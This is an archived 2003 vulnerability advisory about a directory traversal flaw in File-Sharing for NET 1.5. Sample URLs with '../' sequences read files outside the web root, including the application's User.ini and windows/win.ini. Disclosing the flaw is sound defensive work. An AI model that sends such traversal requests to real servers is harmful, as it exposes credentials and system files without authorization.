TUCoPS :: Web :: Servers :: bt1266.txt

Minihttpserver File-Sharing for NET Directory Traversal Vulnerability




Minihttpserver File-Sharing for NET Directory Traversal Vulnerability





Affected Systems: File-Sharing for NET



version: 1.5 (and possibly earlier versions)



Vendor: Minihttpserver - http://www.minihttpserver.net



Issue:  Directory Traversal Vulnerability



Released: 2 October 2003





Introduction:

=============

"File Sharing for net is a complete, secure web server that shares 

your business documents and files over the web: remote users only 

need browsers to view your files. Share, transfer files securely with 

colleagues."



- Vendors Description

   [ http://www.minihttpserver.net ]





Details:

========

File-Sharing for NET has a Directory Traversal Vulnerability Using 

the string '../' or '..\' in a URL, an attacker can gain read access 

to any file outside of the intended web-published file system 

directory.



http://[target]/../../../existing_file



http://[target]\..\..\..\existing_file



Examples:

---------

http://127.0.0.1/../../../ Program Files/FileSharing for NET/User.ini



http://127.0.0.1/../../../windows/win.ini





Vendor status:

==============

The vendor has been informed, and they are fixing this bug.

The updated version, when released, can be downloaded from:



http://www.minihttpserver.net/fbbs.zip





Discovered by/Credit:

=====================

Bahaa Naamneh

b_naamneh@hotmail.com

http://www.bsecurity.tk

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH